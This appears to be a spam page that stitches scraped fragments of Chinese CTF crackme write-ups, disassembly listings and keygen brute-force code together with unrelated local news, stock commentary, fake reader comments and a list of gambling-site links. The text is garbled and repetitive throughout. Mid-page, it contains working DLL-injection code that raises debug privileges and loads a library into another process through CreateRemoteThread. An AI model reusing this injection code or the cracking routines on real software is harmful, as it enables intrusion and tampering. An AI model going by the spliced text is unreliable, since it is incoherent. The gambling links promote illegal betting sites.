0xC6};BYTEbuf1[8];buf1[0]=charset3[k1];buf1[1]=charset3[k2];buf1[2]=charset3[k3];buf1[3]=charset3[63];FillMemory(buf1+4,4,0x04);des_encrypt(buf1,8,key1);CopyMemory(key2[12],buf1,4);rc6_decrypt(expected,sizeof(expected),key2);des_decrypt(expected,sizeof(expected),key1);if(memcmp(expected,_str(),8)==0){CopyMemory(sn,expected,32);sn[32]=charset3[k1];sn[33]=charset3[k2];sn[34]=charset3[k3];sn[35]=charset3[63];sn[sn_len]=0;conver_charset(sn,sn_len,indices,charset,charset3);printf(%s,sn);}}}}}kxuectf{D3crypted1sV3rylntere5tin91}。赌博网  现任广西贵港市委书记,市人大常委会主任、党组书记。如图所示,可以发现其实我们除了引擎之外还依赖其他很多东西。 ,2018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。链接6说因为一些“特殊原因”,Google在底层限制了,但实际上是可通过一些操作实现的:amixIncall_MusicAudioMixerMultiMedia11aplay-Dhw:0,0mono_8khz_实际上也是根据链接3提示的那个软件的smali源码里的关键词找到了链接6。在翻阅这篇旧文章时,我发现了一些字符被转义成了\。虽然这似乎是一场艰苦的斗争-在NotPetya情况下可能得不到什么帮助-用户在这样的情况下的教育仍然是至关重要的:仔细观察任何提示框-尤其是那些要求你下载软件或更新的提示;考虑此提示是否合法,以及它是否在上下文环境中合理。 16=len(sn)=:00402723calledi;:00402725cmpal,:00402727mov[esp+esi+104h+var_B4],:0040272Bjzshortloc_:0040272Daddesi,:00402730cmpesi,:00402733jlshortloc_:00402735mov[esp+esi+104h+var_B4],:0040273Aaddesi,:0040273Dcmpesi,:00402740jaloc_4029DDdes加密,其中多个常数表被替换key="*2017*10"des_cbc_encrypt(sn,key).text:00402771calldes_cbc_:0045AE9CPC1_:0045AED4LOOP_:0045AEE4PC2_:0045AF18IP_:0045AF58E_:0045AF88P_:0045AFA8IPR_:0045AFE8S_Boxsn高4位与低4位与换,转换为16进制字符串.text:004027B0pushesi....text:00402806jbshortloc_4027B0sn计算.text:00402808callmirvar....text:00402876callsub_4022E0bigx=mirvar(0);bigv=mirvar(173);bigy=mirvar(1817);bytes_to_big(len,sn,x);multiply(x,v,x);fft_mult(x,y,y);power(y,2,y);decr(y,1001,y);v=mirvar(317)multiply(y,v,y);//4022E0是用c的浮点函数计算的sn=((sn*173*1817)^2-1001)*317sn=reverse(sn)luajit计算.text:004028F0pushoffsetaLuajit210Beta3;"".text:004028F5push917h;:004028FApushoffsetbyte_45A578;:004028FFpushesi;:00402900callluaL_::::0040290AcallluaJIT_:0040290Fpush0;:00402911push0;:00402913push0;:00402915pushesi;:00402916calllua_:0040291Baddesp,:0040291Etesteax,:00402920jnzshortloc_:::00402924calllua_:00402929pushoffsetaXut;"xut".text:::00402934calllua_:00402939pushoffsetaMyst;"myst".text:::00402944calllua_:00402949push0;:0040294Bpush1;:0040294Dpush0;:0040294Fpushesi;:00402950calllua_pcall....text:00402986push0FFFFFFFFh;:00402988pushesi;:00402989calllua_:0040298Eaddesp,:00402991testeax,:00402993jzshortloc_:00402995push0FFFFFFFFh;:00402997pushesi;:00402998calllua_:0040299Daddesp,:004029A0jmpshortloc_:004029A2moveax,[esp+104h+var_F0].text:004029A6testeax,:004029A8jzshortloc_4029B1xut=snifmyst()==1thenokmyst():x=xutx+=101*1001+(10101+1001*99)*100x*=983751509373x-=1023*13+1203*13*14+1230*13*14*15+1231*13*14*15*16x=(x+1)*2expected=1574592838300862641516215149137548264158058079230003764126382984039489925466995870724568174393389905601620735902909057604303543552180706761904if(x==expected)return1elsereturn0luajit分析根据luaJIT_setmode定位到lj_dispatch_update函数从lj_dispatch_update定位到lj_vm_asm_begin与lj_bc_ofs在lj_vm_asm_begin+lj_bc_ofs[i]处下断,分析各个bytecode的功能.text:0040AFCEcalllj_dispatch_:0040ACA9movzxesi,ds:lj_bc_ofs+:0040ACB0movzxedi,ds:lj_bc_ofs+:0040ACB7movzxebp,ds:lj_bc_ofs+:0040ACBEmovzxeax,ds:lj_bc_ofs+:0040ACC5addesi,offsetlj_vm_asm_:0040ACCBaddedi,offsetlj_vm_asm_:0040ACD1addebp,offsetlj_vm_asm_:0040ACD7addeax,offsetlj_vm_asm_beginKXCTF201710BYLoudy082018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。澳门信誉赌场 在莲藕产业(核心)示范区内布置长廊,内有荷、茶、壮文化作品幅;绘制“荷文化”、“茶文化”及社会主义核心价值观墙体宣传画;布置荷藕题材主题雕塑,大大提升了“荷城贵港,荷美覃塘”文化品位。处理逻辑encode1是base64,encode2和encode3比较简单,略过sn=encode3(sn)+encode2(sn)+encode1(sn)publicclassMainextendsac{...protectedvoidonCreate(){();...//这个不懂为什么没生效,生效的是基类那个(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassuvextendscc{...protectedvoidonCreate(BundlesavedInstanceState){(newView$OnClickListener(){publicvoidonClick(Viewv){Stringv2=().toString().trim();if(((v2)+(v2)+(v2))==1){(,true);}else{(,false);}}});}}publicclassua{static{(enjoy);}...publicstaticnativeintcheck(uathis,Stringarg1){}}处理逻辑JNI_OnLoad中有两个校验和反调试的地方,静态分析的时候直接nop掉,安装完后再替换掉就可以正常调试了(有检测dexsignature和TracerPid什么的).text:00001F4CBLcheck_:00001F50BLcheck_threadso中的check函数.text:00001F38MOVSR3,#:00001F3CLDRR5,[R2,R3].text:00001F3ELDRR2,=(off_5E54-0x1F48).text:00001F40MOVSR0,:00001F42MOVSR3,#:00001F44ADDR2,PCoff_::00005E54off_5E54JNINativeMethodbyte_5E60,aLjavaLangStrin,check+1len(sn)=120,原始sn长度范围(x+x+x/3*4=120):11~36从结果来看原始sn长度是36,但是我后面是从11开始穷举的,浪费了大量的时间.mytext:0000313ELDRR1,[R5].mytext:00003140MOVSR3,#:00003144LDRR3,[R1,R3].mytext:00003146MOVSR2,#:00003148MOVSR1,:0000314AMOVSR0,::0000314EMOVSR6,:00003150BLj_j_strlen_:00003154STRR4,[SP,#0x50+var_4C].mytext:00003156MOVSR1,#:00003158CMPR0,#:0000315ABGTloc_:0000315CADDR4,SP,#0x50+:0000315EMOVSR2,#:00003160MOVSR0,:00003162BLj_j_memset_:00003166MOVSR1,:00003168MOVSR2,#:0000316AMOVSR0,:0000316CBLj_j_memcpy_:00003170LDRR2,[R5].mytext:00003172MOVSR3,#:00003176LDRR3,[R2,R3].mytext:00003178MOVSR1,:0000317AMOVSR2,:0000317CMOVSR0,::00003180MOVSR0,:00003182BLj_j_strlen_:00003186MOVSR1,:00003188MOVSR0,:0000318ABLcheck_snBYTEbuf[40];BYTEkey1[8];BYTEkey2[16];CopyMemory(buf,sn,36);FillMemory(buf+36,0x04,0x04);des_enc(buf,sizeof(buf),key1);(这里des_set_key在处理PC2_Table的时候与标准有偏差)CopyMemory(key2[12],buf[32],4);rc6_encrypt(buf,32,key2,sizeof(key2));(这个不常碰到,跟了一遍)memcmp(buf,expected,32)==0rc6与标准的区别:Q:0x9e3779b9L=0x61C88647L处理前和处理后都进行了byteswap32signedint__fastcallcheck_sn(constvoid*a1,size_ta2){...if(a2==36){v6=j_j_malloc(0x28u);v7=v6;if(v6){j_j_memcpy(v6,v3,v4);v7[36]=4;v7[37]=4;v7[38]=4;v7[39]=4;do{v8=g_key1[v2];v9=0;do{v17[8*v2+v9]=(v8(7-v9))1;++v9;}while(v9!=8);++v2;}while(v2!=8);des_set_key((int)v17);v10=0;do{v11=v7[v10];j_j_memcpy(dest,v7[v10],8u);v15=0;v16=0;des_1840((int)dest,(int)v15);v10+=8;j_j_memcpy(v11,v15,8u);}while(v10!=40);update_key2((int)g_key2,(int)v15);rc6_encrypt(v7,0x20u,(int)g_key2,16);v12=0;while((unsigned__int8)v7[v12]==byte_5D3D[v12]){if(++v12==32){result=1;gotoLABEL_14;}}}}result=0;...}3.穷举sn以kxuectf{开头,以}结尾这里直接按sn长度为36位来穷举了voidDes_SetKey(constcharKey[8]){staticboolK[64];staticboolKL[56];staticboolKR[56];ByteToBit(K,Key,64);Transform(K,K,PC1_Table,56);CopyMemory(KL[0],K[0],28);CopyMemory(KL[28],K[0],28);CopyMemory(KR[0],K[28],28);CopyMemory(KR[28],K[28],28);intoffset=0;for(inti=0;ii++){offset+=LOOP_Table[i];boolTmp[256];for(intn=0;nn++){if(PC2_Table[n]=28){Tmp[n]=KR[PC2_Table[n]-1-28+offset];}else{Tmp[n]=KL[PC2_Table[n]-1+offset];}}memcpy(SubKey[i],Tmp,48);}}voidtest_sn36(){constchar*charset=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789{}constchar*charset2=^_`mEJCTNKOGWRSFYVLZQAH[\\]upibejctnkogwrsfyvlzqahmdxKOGWRSFYVLuiconstchar*charset3=NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm76543210}{intsn_len=36;intindices[36];charsn[40]=BYTEkey1[8]={0xFD,0xB4,0x68,0x54,0x08,0xCD,0x56,0x4E};BYTEkey2[16]={0x65,0x48,0x32,0xEF,0xBA,0xCD,0x56,0x4E,0x0F,0x9B,0x1D,0x27,0x00,0x00,0x00,0x00};CopyMemory(sn,kxuectf{,8);strings1=encode3((PBYTE)sn,8);for(intk1=0;k164;k1++){for(intk2=0;k264;k2++){for(intk3=0;k364;k3++){BYTEexpected[32]={0x42,0xD3,0xC3,0xC2,0xF1,0x2A,0xE9,0x2D,0x66,0xC9,0x28,0x22,0x2C,0xEB,0x54,0x0E,0x94,0x07,0xE5,0x77,0x4A,0x92,0xB7,0x92,0x2E,0x5D,0xFD,0xF0,0xF3,0x54,0x9F,0xC6};BYTEbuf1[8];buf1[0]=charset3[k1];buf1[1]=charset3[k2];buf1[2]=charset3[k3];buf1[3]=charset3[63];FillMemory(buf1+4,4,0x04);des_encrypt(buf1,8,key1);CopyMemory(key2[12],buf1,4);rc6_decrypt(expected,sizeof(expected),key2);des_decrypt(expected,sizeof(expected),key1);if(memcmp(expected,_str(),8)==0){CopyMemory(sn,expected,32);sn[32]=charset3[k1];sn[33]=charset3[k2];sn[34]=charset3[k3];sn[35]=charset3[63];sn[sn_len]=0;conver_charset(sn,sn_len,indices,charset,charset3);printf(%s,sn);}}}}}kxuectf{D3crypted1sV3rylntere5tin91} “aquario”是南美洲国家流行无线路由器的默认密码。:0040100Dmovdword_41B034,:00401017callget_:::00401026moveax,dword_:0040102Btesteax,:0040102Djnzshortloc_:0040102FpushoffsetaYouGetIt;"Yougetit!".text:00401034callsub_:00401039addesp,:0040103Cxoreax,:0040103Eretncheck1v0!=0,v1!=0,v0!=v15*(v1-v0)+v1=0x8F503A4213*(v1-v0)+v0=0xEF503A42化简第一个等式得6*v1-5*v0=0x8F503A42,记为(1)check2v0!=0,v1!=0,v0!=v117*(v1-v0)+v1=0xF3A948837*(v1-v0)+v0=0x33A94883化简第一个等式得18*v1-17*v0=0xF3A94883,记为(2)化简(1),(2)得-2*v0=0x45B899BD,显然不成立2get_sn存在溢出,溢出修改返回地址为0x00413131,sn格式为:11112222333311Av0=0x31313131v1=0x32323232v2=0x33333333第一个验证:4*(v0-v1)+v0+v2=:004133E9subeax,0EAF917E2h第二个验证:3*(v0-v1)+v0+v2=:004135F7subeax,0E8F508C8h第三个验证:3*(v0-v1)+v0-v2=:004136D8subeax,0C0A3C68h化简得v0-v1=02040F1Av0+v2=E2E8DB7Av0-v2=05FE0F1Av0=7473754Av1=726F6630v2=6E756630Just0for0fun11A通过上述分析,我们只需将“JPyjup3eCyJjlkV6DmSmGHQ=”base64解码再rc4解密,即是sn使用在线rc4解密并有base64编码功能的,进行解密:sn=madebyericky94528有3处"sizeof(BloomWord)"的使用应为"sizeof(BloomWord)*8",因为我们处理的是位,而不是字节。,我修复了原本的字符。Payload:要注入的DLL在网上搜索了一些关于DLL注入的资料,发现都没有被注入的DLL的实现,这里首先占用少量篇幅来说明DLL的实现。 成功断到00408E16,将00408E16修改为0xc3。idapro打开,来到main函数fgets(sn,260,stru_4090E0);v3=strlen(sn)-1;if(v38||v320){sub_401BE0(aKeyLenErrorD__);return0;}输入长度为8-20个字符if(v30){do{v6=sn[v5];if(v6=0||v69)++v4;++v5;}while(v5v3);if(v4){sub_401BE0(aKeyFormatError);return0;}}字符组成为1-9big_init(b1);v22=0;big_load(b1,sn);nullsub_1();big_mul((int)b1,9);sn做为大数*9,即b1=sn*9while(1){big_init3(b2,sn);LOBYTE(v22)=1;v7=big_mul2((int)b1,(int)b2);v8=big_mul((int)b1,9)+v7;nullsub_1();if(v8||big_len((int)b1)%2!=1)gotoLABEL_16;v9=big_len((int)b1);v10=big_val((int)b1,v91);v11=big_val((int)b2,0);v12=b2;if(v10==v11)break;LABEL_17:LOBYTE(v22)=0;sub_401390(v12);if(v8){sub_401BE0(aWrongKey___);gotoLABEL_19;}}循环计算b1=b1*sn*9,直到b1长度为奇数且b1[len/2]==sn[0],其中b2==snb2_len=big_len((int)b2)-1;v14=1-big_len((int)b2);b1_len=big_len((int)b1);v16=big_compare(b1,(int)b2,b1_len+v14,1,b2_len,0);v17=big_len((int)b2);if(big_compare(b1,(int)b2,0,1,v17-1,1)+v16){v8=0;LABEL_16:v12=b2;gotoLABEL_17;}sub_401BE0(aWellDone);正向和反向比较b1和sn,长度为sn-1,即sn[1]开始的数字,至此可以确定是在求回文数。来源:Forcepoint安全实验室2017年10月25日本文由看雪翻译小组编译那些经过GC幸存下来的对象被提升(移动)到旧generation。、保护声明Forcepoint客户通过Forcepoint云安全(包括高级分类引擎(ACE)作为电子邮件,Web和NGFW安全产品的一部分)得到保护,免受此威胁。Payload:要注入的DLL在网上搜索了一些关于DLL注入的资料,发现都没有被注入的DLL的实现,这里首先占用少量篇幅来说明DLL的实现。。他表示,一次性的大幅减税,可能会引发国际市场对产品技术借鉴等问题的猜测。二市虽收低开中阳线,但个股仍有近七成绿盘,说明市场分化回剧,资金谨慎仍占上风。。受访的多位专家均认可有序减免,适度释放的原则。2017年以来公司资产负债率有所上升,此次收购是否会进一步加剧负债压力?  多位受访行业人士提出,并购是把双刃剑,频繁的并购动作无疑会拉高房企的负债。香港至内地城市高铁票价,为香港段和内地段高铁票价的总和,港方将会参考人民币票价以港元标价,根据市场实际情况进行调整。”曾在新东方任职的一位中层员工告诉记者,因为各地的教材版本不一样,对K12教育的标准化增加了难度,而新东方通过三四线城市新开教学中心虽然可以兼顾,但无形中又增加了运营成本;另一方面,新东方当前的业务扩展更多是依靠其强大的品牌,在产品创新方面力度不够,没能打造出具有特色的产品并占据市场绝对优势,从这个角度看,其在透支“新东方”这一品牌。。关闭优化选项,dep,aslr,safeseh(vs项目属性选择配置属性-链接器-命令行填写“/SAFESEH:NO”)我们可以试试如果和上次一样覆盖掉返回地址当执行到Security_Check_Cookie的时候,他会检查栈Cookies和.data的副本,这时候GS就分发系统异常处理请求然后就由系统接管处理你这个异常我们可以先用mona插件查看程序当前seh链表这个地址指向的就是PointertonextSEHrecord下面的SEhander是ntdll中的系统接管处理。通过上述分析,我们只需将“JPyjup3eCyJjlkV6DmSmGHQ=”base64解码再rc4解密,即是sn使用在线rc4解密并有base64编码功能的,进行解密:sn=madebyericky94528ActualLock字段指向一个自旋锁,在调用驱动支持的ISR之前用于SynchronizeIrql字段获取IRQL。一些未文档化的结构在不同Windows版本间有所变化。先说一下如何过反调试,调试环境为ida和android模拟器,ida卡到不行啊,羡慕有真机的。OD载入,输入123456,点确定半天没反应,忽然来个内存异常。会议大获成功,受到了梆梆安全、腾讯安全、爱加密、几维安全、百度安全、硬土壳、金山毒霸(猎豹旗下品牌)、乐变技术、腾讯TSRC、Wifi万能钥匙、天特信息、360公司、江民科技、博文视点、华章图书、infoQ、雷锋网等数十家公司和媒体的大力支持和赞助,会场爆满。”贵港市工业和信息化委员会副主任陈晓东说,而两年前,新能源汽车生产对贵港市来说,还是一片空白。。借助SessionStack,可以将视频中的问题重放为视频,并查看用户发生的所有事情。,先后被中国文联授予“德艺双馨艺术家”和国学研究会授予“国学家”等荣誉称号。,通过上述分析,我们只需将“JPyjup3eCyJjlkV6DmSmGHQ=”base64解码再rc4解密,即是sn使用在线rc4解密并有base64编码功能的,进行解密:sn=madebyericky94528截止到目前,全市共建立水稻、茶叶、百香果、蔬菜、马蹄、鸡、鱼等17个作物品种的富硒农产品生产示范基地88个,面积达5万多亩。原标题:贯彻落实绿色发展理念切实保护绿水青山发挥西江黄金水道优势带动各项事业发展  11月8日,市委书记、我市江河湖库总河长李新元到郁江巡河并调研两岸各项建设。步骤:实现:HANDLEGetThePidOfTargetProcess(){//=FindWindowA(0,"Untitled-Notepad");DWORDdwInjectionProcessID;GetWindowThreadProcessId(injectionProcessHwnd,dwInjectionProcessID);cout"Notepadspid-"dwInjectionProcessIDendl;HANDLEinjectionProcessHandle=::OpenProcess(PROCESS_ALL_ACCESS|PROCESS_CREATE_THREAD,0,dwInjectionProcessID);//dwInjectionProcessID);returninjectionProcessHandle;}voidPrivilegeEscalation(){HANDLEhToken;LUIDluid;TOKEN_PRIVILEGEStp;OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,hToken);LookupPrivilegeValue(NULL,SE_DEBUG_NAME,luid);=1;[0].Attributes=SE_PRIVILEGE_ENABLED;[0].Luid=luid;AdjustTokenPrivileges(hToken,0,tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL);}BOOLDoInjection(char*InjectionDllPath,HANDLEinjectionProcessHandle){DWORDinjBufSize=lstrlen((LPCWSTR)InjectionDllPath)+1;LPVOIDAllocAddr=VirtualAllocEx(injectionProcessHandle,NULL,injBufSize,MEM_COMMIT,PAGE_READWRITE);WriteProcessMemory(injectionProcessHandle,AllocAddr,(void*)InjectionDllPath,injBufSize,NULL);PTHREAD_START_ROUTINEpfnStartAddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")),"LoadLibraryA");HANDLEhRemoteThread;if((hRemoteThread=CreateRemoteThread(injectionProcessHandle,NULL,0,pfnStartAddr,AllocAddr,0,NULL))==NULL){ER=GetLastError();cout"CreateRemoteThreadFailed!"endl;returnFALSE;}else{cout"CreateRemoteThreadSuccess!"endl;returnTRUE;}}*具体的实现代码在附件中上传也会附上GitHub地址。,贵港城北新区广西贵港市是一座具有两千多年历史的古郡,又是一个充满生机的新兴内河港口城市。此外,2015年以来,国电集团白花山风电、海大集团贵港饲料生产、步步高集团贵港购物广场、万达集团贵港广场、恒大集团贵港恒大城、碧桂园集团贵港房地产等国际知名企业或全国五百强企业项目纷纷落户港北并开工、投产,投资洼地优势和成效进一步突显。港铁随即回应称,香港高铁所用动车组,其车身主要架构的铝材由日本供应商提供,这与新加坡列车采用的材料供应商不同。。

阅读(356) | 评论(361) | 转发(106) |

上一篇:www.v8183.com

下一篇:www.vns534.com

给主人留下些什么吧!~~

霍利圣洁2018-8-14

邓慧萍  本次大会以创新提出了“人与自然和谐相处”的办会理念。

会议大获成功,受到了梆梆安全、腾讯安全、爱加密、几维安全、百度安全、硬土壳、金山毒霸(猎豹旗下品牌)、乐变技术、腾讯TSRC、Wifi万能钥匙、天特信息、360公司、江民科技、博文视点、华章图书、infoQ、雷锋网等数十家公司和媒体的大力支持和赞助,会场爆满。Satori家族重复使用Mirai代码,包括网络扫描器,telnet密码尝试和看门狗禁用(图4)。。  房车露营在欧美国家盛行已久,近年来才在中国兴起。2017年10月8日,VacronNVR远程攻击被曝光,集成在Iot_reaper中的LUA执行环境,基于集成的LUA执行环境,作者现在可以编写非常复杂和高效的攻击脚本,大约100个DNS开放式解析器被集成在这个恶意软件中,直到现在还没有观察到DDoS攻击命令Md5:CA92A3B74A65CE06035FCC280740DAF6僵尸网络在其lua示例中嵌入了超过100个DNS开放解析器,因此可以轻松地进行dns放大攻击。,od无法调试,先使用ida静态分析,发现该程序加载驱动,patch掉驱动后再动态调试。。

冶万俊2018-8-14 14:44:59

我有一个1024x600的小上网本,好多年了还在用。,2018安全开发者峰会是由拥有18年悠久历史的老牌安全技术社区——看雪学院举办,会议面向开发者、安全人员及高端技术从业人员,是国内开发者与安全人才的年度盛事。。会议大获成功,受到了梆梆安全、腾讯安全、爱加密、几维安全、百度安全、硬土壳、金山毒霸(猎豹旗下品牌)、乐变技术、腾讯TSRC、Wifi万能钥匙、天特信息、360公司、江民科技、博文视点、华章图书、infoQ、雷锋网等数十家公司和媒体的大力支持和赞助,会场爆满。。

王要威2018-8-14 14:44:59

年轻一代最初是平行的。,这样就可以将0替换为这样就可以绕过上面代码的检测,同时还可以能够正确地执行SQL语句。。在上面的代码中,获取函数地址的部分没有具体写,上一篇帖子中详细的说明了获取的过程,差别就是上一篇帖子中需要将RVA转化为文件偏移。。

杨凌霄2018-8-14 14:44:59

因此我制作了一些对我以及他人可能有用的工具。,例如,当一个PTE包含了一个页的有效的物理地址且MMU可以使用这个PTE完成地址转换,那么使用的子结构就是字段。。往下走来到004015C5\8D4C241Cleaecx,dwordptr[esp+1C]/[\DeleteFileA004015D06A05push5004015D28BCDmovecx,ebp004015D4E8770C0000call00402250《-启动线程与驱动交互,dwordptr[esp+120]将004015D0-004015D4NOP掉,过掉线程检查在GetWindowTextA处下断,运行程序输入1111111111111,回车断下,查看调用栈来到_,dwordptr[esp+C][esp+24],,dwordptr[esp+C],dwordptr[esp+C],dwordptr[eax+4][ecx-8],6len(sn)==6004017C90F85F3000000jnz004018C2确定sn长度为6,继续往下分析,将sn反向,然后通过00401D50函数传到驱动进行处理,,dwordptr[esp+18],dwordptr[esp+1C]_,dwordptr[esp+14]对驱动传出来的数据进行md5,在线md5验证一下可确定获取md5后的字符串2-12,共10个字符的子串,dwordptr[esp+14]_,,结果与if(result=16){memcpy(v6,a1,result);v4=0;if(dword_114D8)++v6;if(v30){do{*(v6+v4)+=v4;++v4;}while(v4v3);}md5_init((int)v5);md5__2((int)v5,v6,strlen(v6));result=md5_final((unsignedint*)v5,a2);}首先,对输入值进行简单加法,然后进行md5运算,再然后将结果传回给exe。。

孙伟伟2018-8-14 14:44:59

每个共享的中断向量的IDT条目都指向了第一个KINTERRUPT结构体,其他的KINTERRUPT结构体通过字段InterruptListEntry形成链。,OD打开程序发现OEP是0,程序被加壳或修改过。。UseAfterFree本贴讲述如何利用UAF漏洞,实现GOT表覆盖,从而实现命令执行,另外漏洞程序由本人通过逆向14年的ctf获得,同时进行了一些功能的精简,从而得到下面的漏洞程序,解决漏洞讲解没有漏洞源码源码的问题。。

黄佳坤2018-8-14 14:44:59

其中西山泉汽车露营地是广西第一个以体育休闲为主题,依照五星级汽车露营地标准打造的集户外运动、观光旅游、休闲养生、度假居住为一体的精品体育休闲运动营地,占地327497平方米,拥有9927平方米的主会场,可同时容纳6000余人,拥有88个房车营位,21间汽车旅馆、8栋溪谷木屋、5个观星帐篷、5间野奢帐篷、16间穹顶营房等多个个性化住宿产品。,”  农融代表说,当前,贵港市正处在推动新发展、打赢经济“翻身仗”的关键时期,将按照中央、自治区的决策部署,聚焦实体经济,优化产业结构,实施“工业提质增效年”活动,大力发展战略性新兴产业,打造新兴产业集群。。OD载入,输入123456,点确定半天没反应,忽然来个内存异常。。

评论热议
请登录后评论。

登录 注册

澳门百家乐 老虎机定位器 网上真钱打牌 澳门百家乐详解 赌博网 外围赌球网站
www.376660.com www.663539.com www.3686833.com www.302377.com www.711444.com www.888449.com
www.amyh0003.com www.js13811.com www.224166.com www.bet7058.com www.354msc.com www.88sunncity.com
www.48199.wang www.7872658.com www.la8816.com www.541460.com www.0885004.com www.hg99858.com